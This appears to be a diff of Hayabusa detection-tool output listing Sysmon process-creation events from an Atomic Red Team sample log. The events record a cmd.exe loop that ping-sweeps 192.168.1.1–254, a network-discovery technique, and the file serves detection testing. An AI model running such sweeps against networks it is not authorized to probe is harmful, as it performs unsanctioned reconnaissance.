+2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.8  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.9  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.10  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.11  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.12  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.13  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.14  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.15  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.16  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.17  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.18  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.19  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.20  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.21  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.22  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.23  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.24  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.25  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.26  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.27  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.28  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.29  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.30  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.31  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.32  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.33  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.34  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.35  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.36  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.37  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.38  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.39  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.40  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.41  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.42  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.43  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.44  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.45  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.46  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.47  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.48  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.49  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.50  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.51  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.52  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.53  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.54  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.55  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.56  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.57  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.58  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.59  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.60  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.61  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
